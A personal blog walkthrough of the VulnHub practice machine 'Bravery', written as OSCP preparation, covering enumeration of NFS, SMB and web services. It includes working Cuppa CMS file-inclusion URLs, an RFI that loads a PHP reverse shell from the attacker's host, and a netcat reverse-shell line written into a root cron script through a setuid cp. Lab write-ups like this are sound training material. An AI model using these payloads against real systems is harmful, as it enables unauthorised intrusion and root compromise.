Digitalworld Bravery VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Bravery https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

This box was basically all dependent on enumeration. There’s a lot to look at and go through, but you have to keep going and searching. 95% of the time is spent getting the initial shell. I really liked this box because I got to focus on enumeration and note-taking.

Keeping a cool head, taking good notes about what was found and tried, and pushing forward was key. It isn’t a straight shot to a shell, and there’s a lot of content to go through.

Flow

  1. Run nmap
  2. Run gobuster on ports 80 and 8080
  3. Possible users discovered and cuppacms possible?
  4. NFS share available, /var/nfsshare with user:pass for SMB
  5. Used user:pass with NFS for anonymous share and secured share
  6. /genevieve/ exists, /genevieve/cuppaCMS/index.php exists
  7. Cuppa CMS vulnerability exists and works
  8. Reverse shell by RFI
  9. MySQL access is possible, creds found but lead nowhere
  10. Run a suid/sgid check, find /usr/bin/cp is suid
  11. Can overwrite maintenance.sh script to get a root reverse shell

Enumeration

Nmap – TCP Ports

nmap -sC -sV -oA nmap/tcp_all_ports -p- 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00053s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
|   256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_  256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp    open  domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp   open  ssl/http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after:  2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp   open  netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     3 (RPC #100227)
3306/tcp  open  mysql       MariaDB (unauthorized)
8080/tcp  open  http        nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries 
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
20048/tcp open  mountd      1-3 (RPC #100005)
35505/tcp open  status      1 (RPC #100024)
45776/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.1)
|   Computer name: localhost
|   NetBIOS computer name: BRAVERY\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2020-06-18T07:43:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-06-18T11:43:48
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

Nmap – UDP Top 1000 Ports

nmap -sU -sC -sV -oA nmap/udp_top_1000_ports -p 1-1000 10.88.42.131
Nmap scan report for 10.88.42.131
Host is up (0.00081s latency).
Not shown: 994 closed ports
PORT    STATE         SERVICE     VERSION
53/udp  open          domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
|_dns-recursion: Recursion appears to be enabled
68/udp  open|filtered dhcpc
111/udp open          rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      40222/udp   nlockmgr
|   100021  1,3,4      40701/tcp6  nlockmgr
|   100021  1,3,4      45776/tcp   nlockmgr
|   100021  1,3,4      47137/udp6  nlockmgr
|   100024  1          35505/tcp   status
|   100024  1          37004/udp   status
|   100024  1          40896/udp6  status
|   100024  1          55507/tcp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
137/udp open          netbios-ns  Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
846/udp open          rpcbind     2-4 (RPC #100000)
MAC Address: 00:0C:29:AD:E6:EA (VMware)
Service Info: Host: BRAVERY

Host script results:
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I started UDP for 1000+ ports, but I ended up rebooting and forgot to restart it. Luckily, I didn’t need it.

Services

A lot is going on here. Obviously, web servers stand out, but also SMB shares and NFS shares. Additionally, perhaps I’ll need to try a domain transfer to get subdomains?

So, let’s dig in. Port 80, port 8080, SMB, and NFS.

Port 80

Gobuster

/about (Status: 200)
/1 (Status: 200)
/2 (Status: 200)
/4 (Status: 200)
/3 (Status: 200)
/contactus (Status: 200)
/5 (Status: 200)
/6 (Status: 200)
/9 (Status: 200)
/7 (Status: 200)
/0 (Status: 200)
/8 (Status: 200)
/uploads (Status: 301)

/8 Has Contents

80 and 8080 are best friends!

/about Has Contents

Visit https://www.captiongenerator.com/1075692/Try-Harder for a free hint! :-)

Nope! Not going to check that out.

/contactus Has Contents

Contact us at our hotline!

/uploads Has Contents

Possible users found from browsing the directory listings: patrick, qinyi, sara, and qiu.

/uploads/files/internal/department/procurement/sara/note.txt is the only file in there.

Remind gen to set up my cuppaCMS account.

Port 8080

/robots.txt

User-agent: *
Disallow: /cgi-bin/
Disallow: /qwertyuiop.html
Disallow: /private
Disallow: /public

/cgi-bin/

404 URL.

/qwertyuiop.html

I viewed the source, looked at the image details, but didn’t find anything. So stored “qwertyuiop” as a possible password.

/private

403 URL.

/public

It appears to be a stubbed website. The unique thing is a mail.php that prompts for download, so there’s nothing executing PHP on the 8080 port.

Gobuster

/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

Normal stuff.

/public/about

Prompts to download this file with this content.

********** ABOUT US *********

* We are a fun-loving group *
  that takes our work quite
* seriously. In our line of *
  work, we believe that the 
* most important quality of *
  our work is our effort to 
* TRY HARDER. TRYING HARDER *
  takes courage. We believe 
* we can strive for greater *
  heights, and achieve good
* things as long as we dare *
  to TRY HARDER. Are you up 
* to our challenge? I think *
  you should TRY HARDER! :) 
*                           *

*****************************

MySQL

Can’t connect to the machine, likely only allowing localhost.

ERROR 1130 (HY000): Host '10.88.42.130' is not allowed to connect to this MariaDB server

SMB

[17:34:34]🔴->1 root[ ~/VulnHub/bravery ]# smbclient -L \\\\10.88.42.131
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        anonymous       Disk      
        secured         Disk      
        IPC$            IPC       IPC Service (Samba Server 4.7.1)
SMB1 disabled -- no workgroup available
[17:34:42]🔥root[ ~/VulnHub/bravery ]# 

Unfortunately, I couldn’t access those shares without a login.

NFS

[17:19:59]🔥root[ ~/VulnHub/bravery ]# showmount -e 10.88.42.131
Export list for 10.88.42.131:
/var/nfsshare *
[17:20:02]🔥root[ ~/VulnHub/bravery ]# 
...
mkdir nfsshare
mount 10.88.42.131:/var/nfsshare nfsshare

Great! I got new files; now time to explore them.

nfsshare/README.txt
nfsshare/qwertyuioplkjhgfdsazxcvbnm
nfsshare/discovery
nfsshare/password.txt
nfsshare/explore
nfsshare/enumeration
nfsshare/itinerary
for file in $(find nfsshare -type f); do echo ">> $file <<"; cat $file; done

>> nfsshare/README.txt <<
read me first!
>> nfsshare/qwertyuioplkjhgfdsazxcvbnm <<
Sometimes, the answer you seek may be right before your very eyes.
>> nfsshare/discovery <<
Remember to LOOK AROUND YOU!
>> nfsshare/password.txt <<
Passwords should not be stored in clear-text, written in post-its or written on files on the hard disk!
>> nfsshare/explore <<
Exploration is fun!
>> nfsshare/enumeration <<
Enumeration is at the heart of a penetration test!
>> nfsshare/itinerary/david <<
David will need to fly to various cities for various conferences. Here is his schedule.

1 January 2019 (Tuesday):
New Year's Day. Spend time with family.

2 January 2019 (Wednesday): 
0900: Depart for airport.
0945: Check in at Changi Airport, Terminal 3.
1355 - 2030 hrs (FRA time): Board flight (SQ326) and land in Frankfurt.
2230: Check into hotel.

3 January 2019 (Thursday):
0800: Leave hotel.
0900 - 1700: Attend the Banking and Enterprise Conference.
1730 - 2130: Private reception with the Chancellor.
2230: Retire in hotel.

4 January 2019 (Friday):
0800: Check out from hotel.
0900: Check in at Frankfurt Main.
1305 - 1355: Board flight (LH1190) and land in Zurich.
1600 - 1900: Dinner reception
2000: Check into hotel.

5 January 2019 (Saturday):
0800: Leave hotel.
0930 - 1230: Visit University of Zurich.
1300 - 1400: Working lunch with Mr. Pandelson
1430 - 1730: Dialogue with students at the University of Zurich.
1800 - 2100: Working dinner with Mr. Robert James Miller and wife.
2200: Check into hotel.

6 January 2019 (Sunday):
0730: Leave hotel.
0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.
1130: Check in at Zurich.
1715 - 2025: Board flight (LX18) and land in Newark.
2230: Check into hotel.

7 January 2019 (Monday):
0800: Leave hotel.
0900 - 1200: Visit Goldman Sachs HQ
1230 - 1330: Working lunch with Bill de Blasio
1400 - 1700: Visit McKinsey HQ
1730 - 1830: Visit World Trade Center Memorial
2030: Return to hotel.

8 January 2019 (Tuesday):
0630: Check out from hotel.
0730: Check in at Newark.
0945 - 1715 (+1): Board flight (SQ21)

9 January 2019 (Wednesday):
1715: Land in Singapore.
1815 - 2015: Dinner with wife.
2100: Clear local emails and head to bed.

So, I have a username “david” and “qwertyuioplkjhgfdsazxcvbnm” is likely a password, too. That’s two clues to it now. I added the username and password to the growing password list.

SMB – Revisited

anonymous Share

Now that I have some usernames and passwords, I tried out “david” and “qwertyuioplkjhgfdsazxcvbnm” first, and it worked!

mkdir -p smb/anonymous
smbclient \\\\10.88.42.131\\anonymous -Udavid
smb: \> prompt
smb: \> recurse
smb: \> mget "patrick's folder"
smb: \> mget "qiu's folder"
smb: \> mget "genevieve's folder"
smb: \> mget "david's folder"
smb: \> mget "kenny's folder"
smb: \> mget "qinyi's folder"
smb: \> mget "sara's folder"
smb: \> mget readme.txt

There’s a ton of files to filter through.

[17:47:23]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# find . -type f | wc -l
461
[17:47:29]🔥root[ ~/VulnHub/bravery/smb/anonymous ]# 

After manually going through the files, most of them are empty, so I decided to use some bash to go through them.

cd ..
find . -type f > filelist.txt
cd anonymous
while read -r line; do [ -s "$line" ] && echo ">> $line <<"|tee -a ../anonymous_nonempty_files.txt; cat "$line"|tee -a ../anonymous_nonempty_files.txt ; done < ../filelist.txt

>> ./sara's folder/gossip_corner/gossip18 <<
Qiu gives me too much work. I'm really stressed.
>> ./sara's folder/gossip_corner/gossip27 <<
Misconfigurations are the nightmare of system administrators.
>> ./sara's folder/gossip_corner/gossip5 <<
If only I could get back at the boss... she's so nasty. She controls EVERYTHING and doesn't trust me in even administering her tomcat server.
>> ./sara's folder/gossip_corner/gossip23 <<
Que sera sera, whatever will be, will be.
>> ./sara's folder/email/2048 <<
2048 is a game.

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

BUT...

.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.
.

The CTF is not just a game. It's more than a game. It's about TRYING HARDER... and making sure this machine gets rooted!

.
.
.

ALL THE BEST! TRY HARDER!
>> ./genevieve's folder/CMS/migration/important! <<
need to migrate CMS. obsolete. speak to qiu about temporarily using her IIS to test a sharepoint installation.
>> ./genevieve's folder/email/spear <<
Amidst the flurry of content are certain files that may stand out. Smart bravery will allow you to read what you want; stupid bravery is called recklessness.
>> ./patrick's folder/work!/present_for_qiu/present <<
Should I bring her to watch the "Phantom of the Opera"?

Hmmmm... but she looks so stressed recently... :-(
>> ./patrick's folder/work!/samba/david_secured_share/readme/readme.txt <<
Please DO NOT spread the password around.
>> ./kenny's folder/vuln_assessment_team/windows/XP_disclaimer <<
XP is no longer provided; please upgrade to win7 or win10 because we no longer support XP.
>> ./readme.txt <<
-- READ ME! --

This is an INTERNAL file-sharing system across SMB. While awaiting migration to Sharepoint, we are currently relying on the use of the SMB protocol to share information.

Once we migrate everything to Sharepoint, we will kill off this temporary service. This service will be re-purposes to only share UNCLASSIFIED information.

We also noticed the archival of plenty of e-mail. Please remove all of that before migration, unless you need them.

Regards
Genevieve the Brave

I didn’t see anything useful in the files, but I did add two new users: “kenny” and “genevieve.”

secured Share

[18:15:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# smbclient \\\\10.88.42.131\\secured -U david
Enter WORKGROUP\david's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Sep 28 09:52:14 2018
  ..                                  D        0  Thu Jun 14 12:30:39 2018
  david.txt                           N      376  Sat Jun 16 04:36:07 2018
  genevieve.txt                       N      398  Mon Jul 23 12:51:27 2018
  README.txt                          N      323  Mon Jul 23 21:58:53 2018

                17811456 blocks of size 1024. 13166144 blocks available
smb: \> prompt
smb: \> get *
NT_STATUS_OBJECT_NAME_INVALID opening remote file \*
smb: \> mget *
getting file \david.txt of size 376 as david.txt (73.4 KiloBytes/sec) (average 73.4 KiloBytes/sec)
getting file \genevieve.txt of size 398 as genevieve.txt (97.2 KiloBytes/sec) (average 84.0 KiloBytes/sec)
getting file \README.txt of size 323 as README.txt (105.1 KiloBytes/sec) (average 89.3 KiloBytes/sec)
smb: \> 

And the file contents.

[18:16:34]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat david.txt 
I have concerns over how the developers are designing their webpage. The use of "developmentsecretpage" is too long and unwieldy. We should cut short the addresses in our local domain.

1. Reminder to tell Patrick to replace "developmentsecretpage" with "devops".

2. Request the intern to adjust her Favourites to http://<developmentIPandport>/devops/directortestpagev1.php.
[18:16:37]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat genevieve.txt 
Hi! This is Genevieve!

We are still trying to construct our department's IT infrastructure; it's been proving painful so far.

If you wouldn't mind, please do not subject my site (http://192.168.254.155/genevieve) to any load-test as of yet. We're trying to establish quite a few things:

a) File-share to our director.
b) Setting up our CMS.
c) Requesting for a HIDS solution to secure our host.
[18:16:48]🔥root[ ~/VulnHub/bravery/smb/secured ]# cat README.txt 
README FOR THE USE OF THE BRAVERY MACHINE:

Your use of the BRAVERY machine is subject to the following conditions:

1. You are a permanent staff in Good Tech Inc.
2. Your rank is HEAD and above.
3. You have obtained your BRAVERY badges.

For more enquiries, please log into the CMS using the correct magic word: goodtech.
[18:16:53]🔥root[ ~/VulnHub/bravery/smb/secured ]# 

So, this is awesome; now I have more web URLs that I didn’t have previously.

I tried /developmentsecretpage and /devops on port 80 and 8080, but it was 404 on both. Fortunately, /genevieve was not 404.

Port 80 – Revisited

Browsing the website on /genevieve is a template site but has a link to Cuppa CMS!

http://10.88.42.131/genevieve/cuppaCMS/index.php

cuppaCMS

I searched searchsploit and found a possible cuppaCMS exploit at https://www.exploit-db.com/exploits/25971. So I tried it, and it worked!

http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Configuration.php contents. I added the password to the list.

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "bravery";
		public $user = "root";
		public $password = "r00tisawes0me";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "goodtech";
		public $secure_login_redirect = "doorshell.jpg";
	} 
?>

So, I decided to give the RFI a go.

mkdir www
cp /usr/share/laudanum/php/php-reverse-shell.php www/
cd www
vi php-reverse-shell.php
python3 -m http.server 80
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://10.88.42.130/php-reverse-shell.php
http://10.88.42.131/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http%3A%2F%2F10%2E88%2E42%2E130%2Fphp%2Dreverse%2Dshell%2Ephp

Boom, Popped A Shell!

The RFI worked! I tried to su to david with the password I have, but it didn’t work out.

MySQL – Revisited

Hoping there are passwords stored in there to pivot to “david” or “rick.” I connected using the login info from Configuration.php from earlier.

The “cu_users” table has usernames and passwords in it.

I ran the MD5 hashes through CrackStation.net.

I added the extra usernames and passwords to the list. None of the passwords were meaningful to pivot to root or another user. The only MySQL user is the root user I connected with.

Normal Linux PrivEsc

Before running LinEnum.sh, I decided to search for SUID and SGID files.

Obviously, /usr/bin/cp is not supposed to be SUID, and it stood out like a sore thumb.

From probing around before, I saw the maintenance.sh script but didn’t think much of it. It actually took me a little while to come back to it again to find I could use cp to overwrite the file.

The script is run by root (likely by a cronjob), is owned by root, and I can’t write to it.

bash-4.2$ echo -e '#!/bin/sh\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh
<h\nnc -e /bin/bash 10.88.42.130 9999\n' > /tmp/maintenance.sh               
bash-4.2$ cat /tmp/maintenance.sh
cat /tmp/maintenance.sh
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ cp /tmp/maintenance.sh /var/www/maintenance.sh;cat /var/www/maintenance.sh
<ce.sh /var/www/maintenance.sh;cat /var/www/maintenance.sh                   
#!/bin/sh
nc -e /bin/bash 10.88.42.130 9999

bash-4.2$ 

So, I overwrote it and waited… and the root shell popped!